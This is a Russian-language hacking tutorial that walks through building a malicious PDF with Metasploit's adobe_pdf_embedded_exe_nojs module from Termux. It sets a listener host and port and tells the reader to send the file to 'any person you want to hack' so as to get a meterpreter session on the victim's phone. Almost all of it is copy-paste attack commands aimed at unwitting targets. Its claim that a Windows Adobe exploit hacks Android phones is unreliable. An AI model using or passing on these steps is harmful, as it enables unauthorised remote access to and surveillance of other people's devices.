Как взломать Android телефон через PDF файл

После получения большого количества похвал и признательности в нашем последнем посте о взломе Android to Android через Metasploit. Сейчас мы опубликуем серию хакерских инструментов и техник с рабочим методом и полным описанием. Этот пост посвящен взлому Android с помощью Metasploit с PDF-файлом. Он работает как на Android(через Termux), так и на любом рабочем столе. 

Требования:

1. Приложение Termux( загрузите его из Play Store).
2. Установите Metasploit Framework в Termux.
3. TermuX должен иметь возможность использовать внешнее хранилище (для этого введите команду: “termux-setup-storage”).
4. (Рекомендуется не обязательно) Используйте клавиатуру хакера для легкого ввода команд в TermuX.

После того, как вы выполнили все требования, мы готовы выполнить взлом.

Запуск консоли Metasploit

Прежде всего откройте Termux, если вы находитесь на Android, или просто откройте свой терминал, если он находится на рабочем столе.

Введите следующую команду, чтобы открыть консоль Metasploit

msfconsole

Если такой экран появляется перед вами то у нас все хорошо а если нет то могут возникнуть проблемы с установкой метасплоит.

Создание злого PDF-файла (Полезная нагрузка)

Введите команды, приведенные ниже, или просто скопируйте и вставьте их одну за другой, чтобы создать PDF Файл.

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Затем вы должны установить свой локальный хост. Для этого вам понадобится ваш IP-адрес, чтобы проверить тип вашего IP-адреса

ifconfig

в новом окне seesion на termux или в другом окне терминала. Теперь зайдите в свою консоль metasploit и установите свой Localhost следующим образом –

set LHOST 192.168.0.0

Замените IP-адрес, указанный в приведенной выше команде, вашим собственным IP-адресом

Теперь пришло время для настройки порт для этого введите следующую команду:

set LPORT 4444

Вы можете свободно использовать любой порт, например 4564, 8080 и т. Д.

Теперь пришло время генерировать Злой PDF файл сделайте это с помощью команды ниже:

set filename MyDocument.pdf

Здесь вы также можете использовать любое имя, которое вы хотите просто поставить его на место MyDocument но обязательно поставить .pdf в конце его названия.

Теперь последняя команда для окончательного создания файла сделать это, введя эту команду:

exploit

Теперь в течение секунды появится сообщение о том, что ваш PDF-файл создан в любом месте по умолчанию. Сначала скопируйте этот PDF-файл во внутреннее или внешнее хранилище, как это

mv <fille_location> <new_location>

И теперь вы закончили с частью творения. Отправьте его любому человеку, которого вы хотите взломать. Как только он откроет этот PDF-файл, вы получите сеанс metasploit.

Эксплуатация

Сначала откройте консоль metasploit, набрав

msfconsole

А затем начните писать ниже упомянутую команду:

use exploit/multi/handler/
set LHOST <your_IP>
set LPORT 4444
exploit

Примечание! Убедитесь, что вы ввели тот же IP-адрес и порт, что и выше на шаге 2.

Это займет некоторое время, а затем БУМ вы получите сеанс meterpreter. Если такой вывод появляется, то вы получили доступ к телефону жертвы.